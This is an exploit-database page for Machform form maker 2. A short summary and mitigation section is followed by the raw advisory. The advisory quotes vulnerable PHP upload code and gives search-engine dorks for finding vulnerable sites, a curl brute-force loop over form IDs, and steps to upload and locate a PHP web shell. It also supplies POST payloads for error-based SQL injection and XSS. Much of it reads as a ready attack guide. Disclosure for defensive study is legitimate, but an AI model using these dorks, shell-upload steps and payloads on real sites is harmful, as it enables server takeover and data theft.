header-logo
Suggest Exploit
vendor:
Machform form maker
by:
Yashar shahinzadeh
7.5
CVSS
HIGH
Arbitrary file upload, MySQL Injection (Error based) and XSS
434, 89
CWE
Product Name: Machform form maker
Affected Version From: 2
Affected Version To:
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux & Windows, PHP 5.2.9
2013

Machform form maker – Multiple Vulnerabilities

The Machform form maker has multiple vulnerabilities, including arbitrary file upload, MySQL injection (error based), and XSS. The arbitrary file upload vulnerability allows an attacker to upload files to the server. The MySQL injection vulnerability allows an attacker to execute malicious SQL queries. The XSS vulnerability allows an attacker to inject malicious scripts into web pages viewed by other users. These vulnerabilities can be exploited by an attacker to gain unauthorized access to the system, steal sensitive information, or perform other malicious activities.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to the latest version of Machform form maker and apply any available patches or security updates. Additionally, it is important to sanitize user input and implement proper input validation and output encoding to prevent SQL injection and XSS attacks.
Source

Exploit-DB raw data:

###########################################################################################
# Exploit Title: Machform form maker - Multiple Vulnerabilities
# Date: 2013 17 June
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://www.appnitro.com
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 2
# Special thanks to: Mormoroth
# Dork1: "Powered by MachForm" id=
# Dork2: formularios/view.php?id=
# Dork3: inurl:machform/view.php?id=
#
# Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar
# Contacts: { http://Twitter.com/YShahinzadeh , http://Twitter.com/Mormoroth }
###########################################################################################

Summary:
========
1. Arbitrary file upload
2. MySQL Injection (Error based) and XSS
 

1. Arbitrary file upload:
=========================

...
...
if(!empty($uploaded_files)){
	foreach ($uploaded_files as $element_name){
		if(empty($form_review)){
			//move file and check for invalid file
			$destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}";
			if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
				$filename = mysql_real_escape_string($_FILES[$element_name]['name']);
				$query = "update ap_form_{$form_id} set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
				do_query($query);
			}
		}else{
			//for form with review enabled, append .tmp suffix to all uploaded files
			//move file and check for invalid file
			$destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}.tmp";
			if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
				$filename = mysql_real_escape_string($_FILES[$element_name]['name']);
				$query = "update ap_form_{$form_id}_review set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
				do_query($query);
			}
			
			if(!empty($uploaded_file_lookup[$element_name])){
				unset($uploaded_file_lookup[$element_name]);
			}
		}
	}
}
...
...

Exploit:

In beginning, the hacker must aim view.php located at the root of site, observing the lines inside of mentioned file would be a big lead to disclosure of vulnerability:

$input_array = ap_sanitize_input($_POST);
$submit_result = process_form($input_array);

These two lines have functions leading to have both MySQL injection and Arbitrary file upload vulnerability. I’m not going to audit codes, I may just illustrate the attack started by applying brute-force procedure on ID parameter so as to find a form consisting file upload form, it can be achieved by any program, I just issued a Linux command helped me find it properly:

seq 1 500 | xargs -I XX -P32 curl -s http://target/view.php=XX -o XX.out
grep “type=\”file\”" *.out

Afterwards, an HTML element followed by “for=”(.*)” must be specified, picture below gives better concept:

http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg

All have to be done is uploading PHP shell, and trying to find its name on server. The file will be uploaded in the path:

http://target.com/data/form_[ID]/[element name]-[mysql_insert_id()].php

In URL above, [ID] is gathered in brute-force phase, [element name] is gathered by viewing HTML source, and [mysql_insert_id()] should be brute-forced again. Being relatively difficult, I’ve recorded a clip demonstrating what I’ve said:

http://y-shahinzadeh.ir/tutorial/machform.rar

2. MySQL Injection (Error based) and XSS:
=========================================
...
...
$input_array   = ap_sanitize_input($_POST);
...
...


Exploit (POST to view.php after finding HTML elements): 

element_1=1&element_2=’&element_3=1&form_id=11&submit=1
element_1=1&element_2=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28949236%29%3c%2fScRiPt%3e&element_3=1&form_id=11&submit=Enviar